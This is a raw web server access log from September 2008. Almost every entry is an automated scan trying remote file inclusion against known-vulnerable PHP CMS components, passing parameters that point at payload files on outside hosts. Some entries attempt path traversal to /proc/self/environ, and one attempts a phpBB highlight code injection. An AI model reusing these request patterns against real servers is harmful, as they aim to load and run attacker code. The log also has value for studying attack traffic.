88.84.157.127 - - [07/Sep/2008:07:39:45 -0400] "GET /log/sdaglobal.org-access_log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 369
88.84.157.127 - - [07/Sep/2008:07:39:45 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 340
88.84.157.127 - - [07/Sep/2008:07:40:21 -0400] "GET /log/sdaglobal.org-error_log.1//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 370
212.227.65.79 - - [07/Sep/2008:07:40:40 -0400] "GET //vwar/convert/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 305
212.227.65.79 - - [07/Sep/2008:07:40:44 -0400] "GET //vwar/convert/errors.php?error=http://spd-esens.de/contentimage/pbot.txt?? HTTP/1.1" 404 305
66.187.101.14 - - [07/Sep/2008:07:40:46 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 353
72.29.68.220 - - [07/Sep/2008:07:41:19 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 353
72.29.68.220 - - [07/Sep/2008:07:42:23 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 382
72.29.68.220 - - [07/Sep/2008:07:42:25 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 353
72.29.68.220 - - [07/Sep/2008:07:42:27 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 357
72.29.68.220 - - [07/Sep/2008:07:42:55 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 382
72.29.68.220 - - [07/Sep/2008:07:42:56 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 353
72.29.68.220 - - [07/Sep/2008:07:42:58 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 357
72.29.92.206 - - [07/Sep/2008:07:43:41 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 330
92.51.145.83 - - [07/Sep/2008:07:46:17 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 382
92.51.145.83 - - [07/Sep/2008:07:46:20 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 357
72.29.92.206 - - [07/Sep/2008:07:46:40 -0400] "GET /log/sdaglobal.org-error_log.4//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 360
72.29.92.206 - - [07/Sep/2008:07:46:43 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 330
72.29.92.206 - - [07/Sep/2008:07:46:45 -0400] "GET /log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 334
72.55.156.116 - - [07/Sep/2008:07:46:48 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 324
72.55.156.116 - - [07/Sep/2008:07:46:48 -0400] "GET /log/sdaglobal.org-access_log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 353
72.55.156.116 - - [07/Sep/2008:07:46:49 -0400] "GET /log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 328
69.93.116.170 - - [07/Sep/2008:07:47:03 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 339
69.93.116.170 - - [07/Sep/2008:07:47:05 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 308
72.55.156.116 - - [07/Sep/2008:07:47:06 -0400] "GET /log/sdaglobal.org-error_log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 352
69.93.116.170 - - [07/Sep/2008:07:47:08 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 312
69.93.116.170 - - [07/Sep/2008:07:47:14 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 339
69.93.116.170 - - [07/Sep/2008:07:47:17 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 308
69.93.116.170 - - [07/Sep/2008:07:47:19 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sos-booterz.net/files/id2.txt? HTTP/1.1" 404 312
67.15.48.60 - - [07/Sep/2008:07:48:21 -0400] "GET /log/sdaglobal.org-error_log.3//skin/zero_vote/ask_password.php?dir=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 343
209.250.238.63 - - [07/Sep/2008:07:48:40 -0400] "GET /log/sdaglobal.org-access_log//include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 322
209.250.238.63 - - [07/Sep/2008:07:48:40 -0400] "GET /log/sdaglobal.org-access_log//include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 322
209.250.238.63 - - [07/Sep/2008:07:48:41 -0400] "GET //include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 293
209.250.238.63 - - [07/Sep/2008:07:48:41 -0400] "GET //include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 293
209.250.238.63 - - [07/Sep/2008:07:48:42 -0400] "GET /log//include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 297
209.250.238.63 - - [07/Sep/2008:07:48:42 -0400] "GET /log//include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 297
92.51.145.83 - - [07/Sep/2008:07:48:49 -0400] "GET /phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 292
72.29.92.206 - - [07/Sep/2008:07:49:27 -0400] "GET /log/sdaglobal.org-error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 358
122.201.81.53 - - [07/Sep/2008:07:49:56 -0400] "GET /log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 295
122.201.81.53 - - [07/Sep/2008:07:49:56 -0400] "GET /log/sdaglobal.org-access_log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 320
122.201.81.53 - - [07/Sep/2008:07:49:56 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 291
122.201.81.53 - - [07/Sep/2008:07:50:08 -0400] "GET /log/sdaglobal.org-error_log.4//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 321
195.39.5.203 - - [07/Sep/2008:07:52:33 -0400] "GET /log/sdaglobal.org-access_log.1//yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 357
195.39.5.203 - - [07/Sep/2008:07:52:35 -0400] "GET //yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 326
195.39.5.203 - - [07/Sep/2008:07:52:37 -0400] "GET /log//yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 330
121.135.142.207 - - [07/Sep/2008:07:52:51 -0400] "GET /log/sdaglobal.org-error_log.3//skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 343
87.230.21.231 - - [07/Sep/2008:07:54:38 -0400] "GET /log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 295
87.230.21.231 - - [07/Sep/2008:07:54:39 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 291
64.15.129.168 - - [07/Sep/2008:07:56:29 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 339
202.91.163.60 - - [07/Sep/2008:07:56:35 -0400] "GET /log/index.php?incl=http://www.trueby.ch/.sys/cr4nk/i??? HTTP/1.1" 404 294
64.15.129.168 - - [07/Sep/2008:07:56:36 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 308
202.91.163.60 - - [07/Sep/2008:07:56:40 -0400] "GET /log/errors.php?error=http://www.trueby.ch/.sys/cr4nk/i??? HTTP/1.1" 404 295
202.91.163.60 - - [07/Sep/2008:07:56:43 -0400] "GET /log/index.php?incl=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294
202.91.163.60 - - [07/Sep/2008:07:56:46 -0400] "GET /log/index.php?incl=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
202.91.163.60 - - [07/Sep/2008:07:56:49 -0400] "GET /index.php?incl=http://www.trueby.ch/.sys/cr4nk/i??? HTTP/1.1" 404 290
202.91.163.60 - - [07/Sep/2008:07:56:52 -0400] "GET /errors.php?error=http://www.trueby.ch/.sys/cr4nk/i??? HTTP/1.1" 404 291
202.91.163.60 - - [07/Sep/2008:07:56:55 -0400] "GET /index.php?incl=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 290
202.91.163.60 - - [07/Sep/2008:07:56:58 -0400] "GET /index.php?incl=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
209.250.238.63 - - [07/Sep/2008:07:57:45 -0400] "GET /log/sdaglobal.org-error_log.1//include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 323
209.250.238.63 - - [07/Sep/2008:07:57:46 -0400] "GET /log/sdaglobal.org-error_log.1//include.php?path[docroot]=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 323
92.51.145.83 - - [07/Sep/2008:07:57:53 -0400] "GET /log/sdaglobal.org-access_log.1/phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 323
92.51.145.83 - - [07/Sep/2008:07:57:58 -0400] "GET /log/phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 296
92.51.145.83 - - [07/Sep/2008:07:58:14 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 322
59.125.183.76 - - [07/Sep/2008:07:58:47 -0400] "GET /log/sdaglobal.org-error_log.4//doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 351
59.125.183.76 - - [07/Sep/2008:07:58:50 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 321
59.125.183.76 - - [07/Sep/2008:07:58:53 -0400] "GET /log//doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 325
195.39.5.203 - - [07/Sep/2008:07:59:04 -0400] "GET /log/sdaglobal.org-error_log.3//yoorius/bbs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 356
139.146.146.34 - - [07/Sep/2008:07:59:19 -0400] "GET /log/sdaglobal.org-access_log.1//admin/spaw/spaw_control.class.php?spaw_root=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 346
139.146.146.34 - - [07/Sep/2008:07:59:21 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 315
139.146.146.34 - - [07/Sep/2008:07:59:23 -0400] "GET /log//admin/spaw/spaw_control.class.php?spaw_root=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 319
139.146.146.34 - - [07/Sep/2008:07:59:41 -0400] "GET /log/sdaglobal.org-access_log//admin/spaw/spaw_control.class.php?spaw_root=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 344
139.146.146.34 - - [07/Sep/2008:08:00:05 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 315
190.54.62.91 - - [07/Sep/2008:08:01:07 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.folio.fr/images/inv?? HTTP/1.1" 404 313
190.54.62.91 - - [07/Sep/2008:08:01:07 -0400] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.folio.fr/images/inv?? HTTP/1.1" 404 317
190.54.62.91 - - [07/Sep/2008:08:01:07 -0400] "GET /log/sdaglobal.org-access_log%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.folio.fr/images/inv?? HTTP/1.1" 404 343
139.146.146.34 - - [07/Sep/2008:08:02:21 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 313
203.218.229.186 - - [07/Sep/2008:08:04:15 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
87.119.200.217 - - [07/Sep/2008:08:06:17 -0400] "GET /log//index.php?incl=http://tricospeb.net/wow/pix/p-id.txt??? HTTP/1.1" 404 295
87.119.200.217 - - [07/Sep/2008:08:06:21 -0400] "GET //index.php?incl=http://tricospeb.net/wow/pix/p-id.txt??? HTTP/1.1" 404 291
66.187.101.14 - - [07/Sep/2008:08:06:53 -0400] "GET /log/sdaglobal.org-access_log.1/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 323
66.187.101.14 - - [07/Sep/2008:08:06:59 -0400] "GET /log/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 296
66.187.101.14 - - [07/Sep/2008:08:06:59 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 382
66.187.101.14 - - [07/Sep/2008:08:07:05 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 357
66.187.101.14 - - [07/Sep/2008:08:07:46 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 322
62.87.154.41 - - [07/Sep/2008:08:08:22 -0400] "GET /log/sdaglobal.org-access_log//modules/vwar/admin/admin.php?vwar_root=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 339
62.87.154.41 - - [07/Sep/2008:08:08:22 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 310
62.87.154.41 - - [07/Sep/2008:08:08:24 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 314
60.48.70.89 - - [07/Sep/2008:08:09:23 -0400] "GET /log/sdaglobal.org-access_log.1 HTTP/1.1" 200 4766996
59.125.183.76 - - [07/Sep/2008:08:14:27 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 321
62.87.154.41 - - [07/Sep/2008:08:15:23 -0400] "GET /log/sdaglobal.org-access_log.1//modules/vwar/admin/admin.php?vwar_root=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 341
67.15.80.42 - - [07/Sep/2008:08:15:43 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 320
67.15.80.42 - - [07/Sep/2008:08:15:45 -0400] "GET /log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 295
67.15.80.42 - - [07/Sep/2008:08:15:47 -0400] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 291
67.15.80.42 - - [07/Sep/2008:08:15:59 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 320
67.15.80.42 - - [07/Sep/2008:08:15:59 -0400] "GET /log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 295
67.15.80.42 - - [07/Sep/2008:08:15:59 -0400] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 291
67.15.80.42 - - [07/Sep/2008:08:16:01 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 322
67.15.80.42 - - [07/Sep/2008:08:16:03 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 322
202.123.216.231 - - [07/Sep/2008:08:16:47 -0400] "GET /log/sdaglobal.org-access_log//vwar/convert/errors.php?error=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 334
202.123.216.231 - - [07/Sep/2008:08:16:51 -0400] "GET //vwar/convert/errors.php?error=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 305
202.123.216.231 - - [07/Sep/2008:08:16:53 -0400] "GET /log//vwar/convert/errors.php?error=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 309
87.230.21.231 - - [07/Sep/2008:08:17:31 -0400] "GET /log/errors.php?error=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 295
87.230.21.231 - - [07/Sep/2008:08:17:34 -0400] "GET /errors.php?error=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 291
72.29.68.220 - - [07/Sep/2008:08:19:55 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 382
72.29.68.220 - - [07/Sep/2008:08:19:57 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 353
72.29.68.220 - - [07/Sep/2008:08:19:59 -0400] "GET /log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 357
87.230.21.231 - - [07/Sep/2008:08:20:16 -0400] "GET /log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 295
87.230.21.231 - - [07/Sep/2008:08:20:16 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 291
59.106.19.213 - - [07/Sep/2008:08:20:40 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 322
59.106.19.213 - - [07/Sep/2008:08:20:44 -0400] "GET /errors.php?error=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 291
59.106.19.213 - - [07/Sep/2008:08:20:47 -0400] "GET /log/errors.php?error=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 295
72.55.156.116 - - [07/Sep/2008:08:21:13 -0400] "GET /log/sdaglobal.org-access_log.1//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 354
72.55.156.116 - - [07/Sep/2008:08:21:13 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 323
72.55.156.116 - - [07/Sep/2008:08:21:18 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 327
201.28.77.162 - - [07/Sep/2008:08:21:47 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/b?? HTTP/1.1" 404 321
201.28.77.162 - - [07/Sep/2008:08:21:47 -0400] "GET /log//doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/b?? HTTP/1.1" 404 325
201.28.77.162 - - [07/Sep/2008:08:21:50 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/test.txt??? HTTP/1.1" 404 321
201.28.77.162 - - [07/Sep/2008:08:21:50 -0400] "GET /log//doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/test.txt??? HTTP/1.1" 404 325
194.165.49.171 - - [07/Sep/2008:08:21:56 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 322
194.165.49.171 - - [07/Sep/2008:08:21:57 -0400] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 292
194.165.49.171 - - [07/Sep/2008:08:21:59 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 296
72.55.156.116 - - [07/Sep/2008:08:22:17 -0400] "GET /log/sdaglobal.org-access_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 352
72.47.213.57 - - [07/Sep/2008:08:22:22 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 322
72.47.213.57 - - [07/Sep/2008:08:22:25 -0400] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 292
72.47.213.57 - - [07/Sep/2008:08:22:28 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 296
194.165.49.171 - - [07/Sep/2008:08:22:53 -0400] "GET /log/sdaglobal.org-error_log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 320
72.47.213.57 - - [07/Sep/2008:08:23:11 -0400] "GET /log/sdaglobal.org-error_log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 320
72.47.213.57 - - [07/Sep/2008:08:23:29 -0400] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 292
59.106.19.213 - - [07/Sep/2008:08:25:08 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 320
194.165.49.171 - - [07/Sep/2008:08:28:39 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 296
194.165.49.171 - - [07/Sep/2008:08:28:41 -0400] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 292
72.47.213.57 - - [07/Sep/2008:08:28:41 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 296
72.47.213.57 - - [07/Sep/2008:08:28:43 -0400] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 292
194.165.49.171 - - [07/Sep/2008:08:29:15 -0400] "GET /log/sdaglobal.org-error_log.3/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 322
194.165.49.171 - - [07/Sep/2008:08:29:16 -0400] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 292
194.165.49.171 - - [07/Sep/2008:08:29:17 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 296
194.165.49.171 - - [07/Sep/2008:08:30:21 -0400] "GET /log/sdaglobal.org-error_log/phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 320
89.108.67.204 - - [07/Sep/2008:08:33:08 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 328
89.108.67.204 - - [07/Sep/2008:08:35:00 -0400] "GET /log/sdaglobal.org-access_log.1//modules/My_eGallery/public/displayCategory.php?basepath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 359
89.108.67.204 - - [07/Sep/2008:08:35:01 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 328
89.108.67.204 - - [07/Sep/2008:08:35:01 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://sunshineaviation.com/osticket/osy2.txt? HTTP/1.1" 404 332
194.165.49.171 - - [07/Sep/2008:08:35:11 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 322
194.165.49.171 - - [07/Sep/2008:08:35:12 -0400] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 291
194.165.49.171 - - [07/Sep/2008:08:35:12 -0400] "GET /log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 295
194.165.49.171 - - [07/Sep/2008:08:35:50 -0400] "GET /log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 295
194.165.49.171 - - [07/Sep/2008:08:35:50 -0400] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 291
